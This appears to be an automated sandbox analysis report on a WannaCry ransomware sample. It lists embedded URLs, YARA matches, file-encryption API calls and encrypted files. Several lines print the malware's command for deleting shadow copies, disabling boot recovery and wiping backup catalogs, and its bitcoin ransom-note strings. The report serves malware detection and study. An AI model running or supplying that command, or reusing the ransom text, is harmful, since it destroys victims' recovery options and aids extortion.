Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=491668
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=649285
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000004.00000002.1431627052.000002DC08263000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000004.00000002.1431925217.000002DC08270000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1411800337.000002DC0826E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000004.00000002.1431816718.000002DC08268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1413170981.000002DC08267000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000004.00000003.1410666875.000002DC08275000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1432110894.000002DC08277000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000004.00000003.1413656484.000002DC08262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1416923421.000002DC0825A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431627052.000002DC08263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1430382033.000002DC0822B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000004.00000002.1431816718.000002DC08268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1413170981.000002DC08267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1430382033.000002DC0822B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000004.00000003.1413656484.000002DC08262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431627052.000002DC08263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1430382033.000002DC0822B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000004.00000002.1430992301.000002DC08242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1417660737.000002DC08241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000004.00000003.1413656484.000002DC08262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431627052.000002DC08263000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3719819751.000000001000C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3719819751.000000001000C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zipP
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
Source: svchost.exe, 00000004.00000003.1417921521.000002DC08231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1413656484.000002DC08262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431627052.000002DC08263000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000004.00000003.1417660737.000002DC08241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000004.00000003.1413656484.000002DC08262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431627052.000002DC08263000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000004.00000002.1430992301.000002DC08242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1417660737.000002DC08241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1414215402.000002DC0825D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000004.00000003.1413734420.000002DC08261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000004.00000002.1431816718.000002DC08268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1413170981.000002DC08267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1430382033.000002DC0822B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/eslint/eslint/issues/3229
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/infrastructure.html#strip-and-collapse-whitespace
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
Source: wBQInv.exe, 00000002.00000003.1276194123.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, wBQInv.exe, 00000002.00000002.1607845694.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-48
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-54
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-57
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-59
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-61
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-64
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promisesaplus.com/#point-75
Source: svchost.exe, 00000004.00000003.1417088659.000002DC08249000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.
Source: svchost.exe, 00000004.00000003.1417660737.000002DC08241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000004.00000002.1430458930.000002DC08237000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1417088659.000002DC08249000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000004.00000003.1417088659.000002DC08249000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000004.00000002.1430382033.000002DC0822B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3712568071.0000000002D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.2291348728.0000000000963000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1316026746.000000000090E000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1798063418.0000000000960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=how

Spam, unwanted Advertisements and Ransom Demands

Detected Wannacry Ransomware

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: CreateFileA,GetFileSizeEx,ReadFile,memcmp,ReadFile,ReadFile,ReadFile,ReadFile,GlobalAlloc,ReadFile,_local_unwind2, WANACRY!	0_2_004014A6
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: CreateFileW,CreateFileW,GetFileSizeEx,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,_local_unwind2,SetFilePointer,SetFilePointer,swprintf,CreateFileW,CreateFileW,ReadFile,SetFilePointer,WriteFile,SetFilePointer,WriteFile,SetFilePointer,rand,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,SetFilePointer,ReadFile,WriteFile,SetFilePointer,ReadFile,WriteFile,_local_unwind2,SetFileTime,FindCloseChangeNotification,CloseHandle,MoveFileW,SetFileAttributesW,DeleteFileW,CloseHandle,MoveFileW,_local_unwind2, WANACRY!	0_2_10001960
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: CreateFileW,CreateFileW,GetFileSizeEx,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,_local_unwind2,SetFilePointer,SetFilePointer,swprintf,CreateFileW,CreateFileW,ReadFile,SetFilePointer,WriteFile,SetFilePointer,WriteFile,SetFilePointer,rand,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,SetFilePointer,ReadFile,WriteFile,SetFilePointer,ReadFile,WriteFile,_local_unwind2,SetFileTime,FindCloseChangeNotification,CloseHandle,MoveFileW,SetFileAttributesW,DeleteFileW,CloseHandle,MoveFileW,_local_unwind2, WANACRY!	0_2_10001960

Yara detected Wannacry ransomware

Source: Yara match	File source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, type: SAMPLE
Source: Yara match	File source: 0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2291348728.0000000000963000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1316026746.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1798063418.0000000000960000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1797315090.0000000000960000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe PID: 4548, type: MEMORYSTR
Source: Yara match	File source: C:\@WanaDecryptor@.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\u.wnry, type: DROPPED

Contains functionalty to change the wallpaper

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Code function: 0_2_10004F20 swprintf,swprintf,MultiByteToWideChar,CopyFileW,CopyFileW,GetUserNameW,_wcsicmp,SystemParametersInfoW,swprintf,CopyFileW,

0_2_10004F20

Deletes shadow drive data (may be related to ransomware)

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.2291348728.0000000000963000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.2291348728.0000000000963000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1316026746.000000000090E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1316026746.000000000090E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1798063418.0000000000960000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1798063418.0000000000960000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File moved: C:\Users\user\Desktop\UNKRLCVOHV\AQRFEVRTGL.pdf	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File deleted: C:\Users\user\Desktop\UNKRLCVOHV\AQRFEVRTGL.pdf	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File moved: C:\Users\user\Desktop\BWDRWEEARI.png	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File deleted: C:\Users\user\Desktop\BWDRWEEARI.png	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File moved: C:\Users\user\Desktop\LIJDSFKJZG.xlsx	Jump to behavior

Writes many files with high entropy

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT entropy: 7.99279688819	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.WNCRYT entropy: 7.99323820554	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.WNCRYT entropy: 7.99989969069	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.WNCRYT entropy: 7.99979395184	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.WNCRYT entropy: 7.99996527153	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.WNCRYT entropy: 7.99950791599	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\common\analytics.js.WNCRYT entropy: 7.99276245496	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\libs\jquery-3.1.1.js.WNCRYT entropy: 7.99926013262	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\libs\jquery-3.1.1.min.js.WNCRYT entropy: 7.99763908214	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.99972384818	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\hero-image-desktop-f6720a4145[1].jpg.WNCRYT entropy: 7.99862900775	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409637954002018.txt.WNCRYT entropy: 7.99824256097	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsglobals.txt.WNCRYT entropy: 7.99951534129	Jump to dropped file
